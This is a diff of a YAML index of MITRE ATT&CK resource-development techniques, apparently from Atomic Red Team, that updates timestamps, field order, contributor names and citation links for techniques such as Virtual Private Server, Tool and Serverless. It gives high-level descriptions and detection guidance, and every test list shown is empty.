@@ -53263,7 +53938,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.002:
     technique:
@@ -53323,7 +53997,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.001:
     technique:
@@ -53345,7 +54018,7 @@ resource-development:
         description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
           SunshopFireEye. Retrieved March 6, 2017.'
         url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:15:52.805Z'
       name: Malware
       description: |-
         Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
@@ -53364,42 +54037,10 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
       - 'Malware Repository: Malware Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
-      type: attack-pattern
-      created: '2020-10-01T00:44:23.935Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1583.003
-        url: https://attack.mitre.org/techniques/T1583/003
-      - source_name: TrendmicroHideoutsLease
-        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
-          Bulletproof Hosting Services. Retrieved March 6, 2017.'
-        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
-      - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
-        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
-          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      - source_name: Mandiant SCANdalous Jul 2020
-        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
-        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
-          Using Network Scan Data and Automation). Retrieved October 12, 2021.
-      - source_name: Koczwara Beacon Hunting Sep 2021
-        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
-        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
-          Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:22:11.113Z'
       name: Virtual Private Server
       description: |-
         Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
@@ -53408,22 +54049,53 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+      created: '2020-10-01T00:44:23.935Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1583/003
+        external_id: T1583.003
+      - source_name: Koczwara Beacon Hunting Sep 2021
+        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+          Shodan. Retrieved October 12, 2021.
+        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+      - source_name: TrendmicroHideoutsLease
+        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+          Bulletproof Hosting Services. Retrieved March 6, 2017.'
+        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+      - source_name: Mandiant SCANdalous Jul 2020
+        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+          Using Network Scan Data and Automation). Retrieved October 12, 2021.
+        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+      - source_name: ThreatConnect Infrastructure Dec 2020
+        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1584:
     technique:
-      modified: '2024-03-28T03:53:28.299Z'
+      modified: '2024-10-16T20:06:03.570Z'
       name: Compromise Infrastructure
       description: |-
         Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
@@ -53437,7 +54109,7 @@ resource-development:
       x_mitre_contributors:
       - Jeremy Galloway
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
         information and/or domain resolution information that may indicate the compromise
@@ -53524,11 +54196,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T01:08:56.774Z'
       name: Compromise Accounts
       description: "Adversaries may compromise accounts with services that can be
         used during targeting. For operations incorporating social engineering, the
@@ -53588,7 +54259,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.005:
     technique:
@@ -53630,7 +54300,7 @@ resource-development:
         servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
         adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
         or Distributed Denial of Service (DDoS).'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T15:55:58.319Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Botnet
       x_mitre_detection: Much of this activity will take place outside the visibility
@@ -53645,7 +54315,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608:
     technique:
@@ -53736,11 +54405,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.005:
     technique:
-      modified: '2024-04-13T14:03:24.673Z'
+      modified: '2024-10-16T20:09:41.391Z'
       name: Link Target
       description: "Adversaries may put in place resources that are referenced by
         a link that can be used during targeting. An adversary may rely upon a user
@@ -53773,15 +54441,16 @@ resource-development:
         to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
         Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
         In addition, adversaries may serve a variety of malicious links through uniquely
-        generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
-        Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
-        decentralized nature of the InterPlanetary File System (IPFS) to host link
-        targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+        generated URIs/URLs (including one-time, single use links).(Citation: iOS
+        URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+        adversaries may take advantage of the decentralized nature of the InterPlanetary
+        File System (IPFS) to host link targets that are difficult to remove.(Citation:
+        Talos IPFS 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hen Porcilan
       - Diyar Saadi Ali
       - Nikola Kovac
@@ -53865,7 +54534,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.006:
     technique:
@@ -53919,7 +54587,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.003:
     technique:
@@ -53970,36 +54637,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - SOCCRATES
-      - Mnemonic AS
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
-      type: attack-pattern
-      created: '2020-10-01T02:08:33.977Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588.002
-        url: https://attack.mitre.org/techniques/T1588/002
-      - source_name: Recorded Future Beacon 2019
-        url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
-        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
-          Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      modified: '2021-10-17T16:17:55.499Z'
+      modified: '2024-09-16T16:20:16.431Z'
       name: Tool
       description: |-
         Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
@@ -54008,21 +54649,47 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - SOCCRATES
+      - Mnemonic AS
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+      created: '2020-10-01T02:08:33.977Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/002
+        external_id: T1588.002
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: Recorded Future Beacon 2019
+        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+          Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1584.006:
     technique:
-      modified: '2023-04-12T20:19:21.620Z'
+      modified: '2024-10-15T16:44:09.114Z'
       name: Web Services
       description: 'Adversaries may compromise access to third-party web services that
         can be used during targeting. A variety of popular websites exist for legitimate
@@ -54068,17 +54735,16 @@ resource-development:
         external_id: T1584.006
       - source_name: Recorded Future Turla Infra 2020
         description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
-          Tracking Turla Infrastructure. Retrieved October 20, 2020.'
-        url: https://www.recordedfuture.com/turla-apt-infrastructure/
+          Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/research/turla-apt-infrastructure
       - source_name: ThreatConnect Infrastructure Dec 2020
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.001:
     technique:
@@ -54104,7 +54770,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:37:34.563Z'
       name: Social Media Accounts
       description: "Adversaries may create and cultivate social media accounts that
         can be used during targeting. Adversaries can create social media accounts
@@ -54136,8 +54802,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Persona: Social Media'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.004:
     technique:
@@ -54164,7 +54828,7 @@ resource-development:
         url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
         description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
           Exploitation. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:07:53.803Z'
       name: Exploits
       description: |-
         Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -54188,8 +54852,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.003:
     technique:
@@ -54215,7 +54877,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:47:46.409Z'
       name: Install Digital Certificate
       description: "Adversaries may install SSL/TLS certificates that can be used
         during targeting. SSL/TLS certificates are files that can be installed on
@@ -54249,8 +54911,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.002:
     technique:
@@ -54298,7 +54958,7 @@ resource-development:
         Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
 
         By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019)  Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:22:13.578Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: DNS Server
       x_mitre_detection: |-
@@ -54314,7 +54974,6 @@ resource-development:
       - 'Domain Name: Passive DNS'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585:
     technique:
@@ -54373,54 +55032,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
-      type: attack-pattern
-      created: '2020-10-01T01:56:24.776Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588
-        url: https://attack.mitre.org/techniques/T1588
-      - source_name: NationsBuying
-        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
-          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
-        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
-      - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
-        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
-          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
-          Human Rights Defender. Retrieved December 12, 2016.'
-        source_name: PegasusCitizenLab
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: FireEyeSupplyChain
-        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
-          SunshopFireEye. Retrieved March 6, 2017.'
-        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.568Z'
       name: Obtain Capabilities
       description: |-
         Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
@@ -54431,22 +55046,66 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
       - 'Malware Repository: Malware Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+      created: '2020-10-01T01:56:24.776Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588
+        external_id: T1588
+      - source_name: PegasusCitizenLab
+        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+          Human Rights Defender. Retrieved December 12, 2016.'
+        url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+      - source_name: FireEyeSupplyChain
+        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+          SunshopFireEye. Retrieved March 6, 2017.'
+        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: NationsBuying
+        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1650:
     technique:
@@ -54509,37 +55168,38 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.007:
     technique:
-      modified: '2022-10-20T21:19:57.555Z'
+      modified: '2024-10-03T14:18:34.045Z'
       name: Serverless
       description: "Adversaries may compromise serverless cloud infrastructure, such
-        as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
-        By utilizing serverless infrastructure, adversaries can make it more difficult
-        to attribute infrastructure used during operations back to them. \n\nOnce
-        compromised, the serverless runtime environment can be leveraged to either
-        respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+        as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+        can be used during targeting. By utilizing serverless infrastructure, adversaries
+        can make it more difficult to attribute infrastructure used during operations
+        back to them. \n\nOnce compromised, the serverless runtime environment can
+        be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
         traffic to an adversary-owned command and control server.(Citation: BlackWater
-        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
-        by these functions will appear to come from subdomains of common cloud providers,
-        it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+        Apps Script Abuse 2021) As traffic generated by these functions will appear
+        to come from subdomains of common cloud providers, it may be difficult to
+        distinguish from ordinary traffic to these providers - making it easier to
+        [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
         Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
         Workers)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
